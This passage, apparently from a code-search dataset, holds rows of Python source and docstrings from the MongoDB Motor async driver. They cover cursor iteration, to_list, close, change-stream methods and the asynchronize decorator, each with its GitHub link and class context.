.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L912-L971 | [
"def _buffer_size(self):\n return len(self._data())\n"
] | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
def _get_more(self):
"""Initial query or getMore. Returns a Future."""
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh()
@property
@coroutine_annotation
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def to_list(self, length):
"""Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional.
"""
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def close(self):
"""Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close()
"""
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close())
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor.to_list | python | def to_list(self, length):
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future | Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1062-L1127 | [
"def _query_flags(self):\n raise NotImplementedError\n"
] | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
def _get_more(self):
"""Initial query or getMore. Returns a Future."""
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh()
@property
@coroutine_annotation
def fetch_next(self):
"""A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches
"""
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def close(self):
"""Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close()
"""
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close())
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor.close | python | def close(self):
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close()) | Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close() | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1161-L1170 | [
"def _close(self):\n raise NotImplementedError()\n"
] | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
def _get_more(self):
"""Initial query or getMore. Returns a Future."""
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh()
@property
@coroutine_annotation
def fetch_next(self):
"""A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches
"""
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def to_list(self, length):
"""Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional.
"""
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticChangeStream.next | python | def next(self):
loop = self.get_io_loop()
return self._framework.run_on_executor(loop, self._next) | Advance the cursor.
This method blocks until the next change document is returned or an
unrecoverable error is raised.
Raises :exc:`StopAsyncIteration` if this change stream is closed.
You can iterate the change stream by calling
``await change_stream.next()`` repeatedly, or with an "async for" loop:
.. code-block:: python3
async for change in db.collection.watch():
print(change) | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1419-L1437 | [
"def get_io_loop(self):\n return self._target.get_io_loop()\n"
] | class AgnosticChangeStream(AgnosticBase):
"""A change stream cursor.
Should not be called directly by application developers. See
:meth:`~MotorCollection.watch` for example usage.
.. versionadded: 1.2
.. mongodoc:: changeStreams
"""
__delegate_class__ = ChangeStream
__motor_class_name__ = 'MotorChangeStream'
_close = AsyncCommand(attr_name='close')
def __init__(self, target, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session):
super(self.__class__, self).__init__(delegate=None)
# The "target" object is a client, database, or collection.
self._target = target
self._kwargs = {'pipeline': pipeline,
'full_document': full_document,
'resume_after': resume_after,
'max_await_time_ms': max_await_time_ms,
'batch_size': batch_size,
'collation': collation,
'start_at_operation_time': start_at_operation_time,
'session': session}
def _next(self):
# This method is run on a thread.
try:
if not self.delegate:
self.delegate = self._target.delegate.watch(**self._kwargs)
return self.delegate.next()
except StopIteration:
raise StopAsyncIteration()
@coroutine_annotation
@coroutine_annotation
def close(self):
"""Close this change stream.
Stops any "async for" loops using this change stream.
"""
if self.delegate:
return self._close()
# Never started.
future = self._framework.get_future(self.get_io_loop())
future.set_result(None)
return future
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
__anext__ = next
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if self.delegate:
self.delegate.close()
"""), globals(), locals())
def get_io_loop(self):
return self._target.get_io_loop()
def __enter__(self):
raise RuntimeError('Use a change stream in "async with", not "with"')
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
mongodb/motor | motor/core.py | AgnosticChangeStream.close | python | def close(self):
if self.delegate:
return self._close()
# Never started.
future = self._framework.get_future(self.get_io_loop())
future.set_result(None)
return future | Close this change stream.
Stops any "async for" loops using this change stream. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L1440-L1451 | [
"def get_io_loop(self):\n return self._target.get_io_loop()\n"
] | class AgnosticChangeStream(AgnosticBase):
"""A change stream cursor.
Should not be called directly by application developers. See
:meth:`~MotorCollection.watch` for example usage.
.. versionadded: 1.2
.. mongodoc:: changeStreams
"""
__delegate_class__ = ChangeStream
__motor_class_name__ = 'MotorChangeStream'
_close = AsyncCommand(attr_name='close')
def __init__(self, target, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session):
super(self.__class__, self).__init__(delegate=None)
# The "target" object is a client, database, or collection.
self._target = target
self._kwargs = {'pipeline': pipeline,
'full_document': full_document,
'resume_after': resume_after,
'max_await_time_ms': max_await_time_ms,
'batch_size': batch_size,
'collation': collation,
'start_at_operation_time': start_at_operation_time,
'session': session}
def _next(self):
# This method is run on a thread.
try:
if not self.delegate:
self.delegate = self._target.delegate.watch(**self._kwargs)
return self.delegate.next()
except StopIteration:
raise StopAsyncIteration()
@coroutine_annotation
def next(self):
"""Advance the cursor.
This method blocks until the next change document is returned or an
unrecoverable error is raised.
Raises :exc:`StopAsyncIteration` if this change stream is closed.
You can iterate the change stream by calling
``await change_stream.next()`` repeatedly, or with an "async for" loop:
.. code-block:: python3
async for change in db.collection.watch():
print(change)
"""
loop = self.get_io_loop()
return self._framework.run_on_executor(loop, self._next)
@coroutine_annotation
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
__anext__ = next
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if self.delegate:
self.delegate.close()
"""), globals(), locals())
def get_io_loop(self):
return self._target.get_io_loop()
def __enter__(self):
raise RuntimeError('Use a change stream in "async with", not "with"')
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
mongodb/motor | motor/metaprogramming.py | asynchronize | python | def asynchronize(
framework, sync_method, doc=None, wrap_class=None, unwrap_class=None):
@functools.wraps(sync_method)
def method(self, *args, **kwargs):
if unwrap_class is not None:
# Don't call isinstance(), not checking subclasses.
unwrapped_args = [
obj.delegate
if obj.__class__.__name__.endswith(
(unwrap_class, 'MotorClientSession'))
else obj
for obj in args]
unwrapped_kwargs = {
key: (obj.delegate
if obj.__class__.__name__.endswith(
(unwrap_class, 'MotorClientSession'))
else obj)
for key, obj in kwargs.items()}
else:
# For speed, don't call unwrap_args_session/unwrap_kwargs_session.
unwrapped_args = [
obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj
for obj in args]
unwrapped_kwargs = {
key: (obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj)
for key, obj in kwargs.items()}
loop = self.get_io_loop()
return framework.run_on_executor(loop,
sync_method,
self.delegate,
*unwrapped_args,
**unwrapped_kwargs)
if wrap_class is not None:
method = framework.pymongo_class_wrapper(method, wrap_class)
method.is_wrap_method = True # For Synchro.
# This is for the benefit of motor_extensions.py, which needs this info to
# generate documentation with Sphinx.
method.is_async_method = True
name = sync_method.__name__
method.pymongo_method_name = name
if doc is not None:
method.__doc__ = doc
return method | Decorate `sync_method` so it returns a Future.
The method runs on a thread and resolves the Future when it completes.
:Parameters:
- `motor_class`: Motor class being created, e.g. MotorClient.
- `framework`: An asynchronous framework
- `sync_method`: Unbound method of pymongo Collection, Database,
MongoClient, etc.
- `doc`: Optionally override sync_method's docstring
- `wrap_class`: Optional PyMongo class, wrap a returned object of
this PyMongo class in the equivalent Motor class
- `unwrap_class` Optional Motor class name, unwrap an argument with
this Motor class name and pass the wrapped PyMongo
object instead | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/metaprogramming.py#L27-L94 | null | # Copyright 2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals, absolute_import
"""Dynamic class-creation for Motor."""
import inspect
import functools
from pymongo.cursor import Cursor
_class_cache = {}
def unwrap_args_session(args):
return (
obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj
for obj in args)
def unwrap_kwargs_session(kwargs):
return {
key: (obj.delegate
if obj.__class__.__name__.endswith('MotorClientSession')
else obj)
for key, obj in kwargs.items()}
_coro_token = object()
def motor_coroutine(f):
"""Used by Motor classes to mark functions as coroutines.
create_class_with_framework will decorate the function with a framework-
specific coroutine decorator, like asyncio.coroutine or Tornado's
gen.coroutine.
You cannot return a value from a motor_coroutine, the syntax differences
between Tornado on Python 2 and asyncio with Python 3.5 are impossible to
bridge.
"""
f._is_motor_coroutine = _coro_token
return f
def coroutine_annotation(f):
"""In docs, annotate a function that returns a Future with 'coroutine'.
Unlike @motor_coroutine, this doesn't affect behavior.
"""
# Like:
# @coroutine_annotation
# def method(self):
#
f.coroutine_annotation = True
return f
class MotorAttributeFactory(object):
"""Used by Motor classes to mark attributes that delegate in some way to
PyMongo. At module import time, create_class_with_framework calls
create_attribute() for each attr to create the final class attribute.
"""
def __init__(self, doc=None):
self.doc = doc
def create_attribute(self, cls, attr_name):
raise NotImplementedError
class Async(MotorAttributeFactory):
def __init__(self, attr_name, doc=None):
"""A descriptor that wraps a PyMongo method, such as insert_one,
and returns an asynchronous version of the method that returns a Future.
:Parameters:
- `attr_name`: The name of the attribute on the PyMongo class, if
different from attribute on the Motor class
"""
super(Async, self).__init__(doc)
self.attr_name = attr_name
self.wrap_class = None
self.unwrap_class = None
def create_attribute(self, cls, attr_name):
name = self.attr_name or attr_name
method = getattr(cls.__delegate_class__, name)
return asynchronize(framework=cls._framework,
sync_method=method,
doc=self.doc,
wrap_class=self.wrap_class,
unwrap_class=self.unwrap_class)
def wrap(self, original_class):
self.wrap_class = original_class
return self
def unwrap(self, class_name):
self.unwrap_class = class_name
return self
class AsyncRead(Async):
def __init__(self, attr_name=None, doc=None):
"""A descriptor that wraps a PyMongo read method like find_one() that
returns a Future.
"""
Async.__init__(self, attr_name=attr_name, doc=doc)
class AsyncWrite(Async):
def __init__(self, attr_name=None, doc=None):
"""A descriptor that wraps a PyMongo write method like update() that
accepts getLastError options and returns a Future.
"""
Async.__init__(self, attr_name=attr_name, doc=doc)
class AsyncCommand(Async):
def __init__(self, attr_name=None, doc=None):
"""A descriptor that wraps a PyMongo command like copy_database() that
returns a Future and does not accept getLastError options.
"""
Async.__init__(self, attr_name=attr_name, doc=doc)
class ReadOnlyProperty(MotorAttributeFactory):
    """Creates a readonly attribute on the wrapped PyMongo object."""

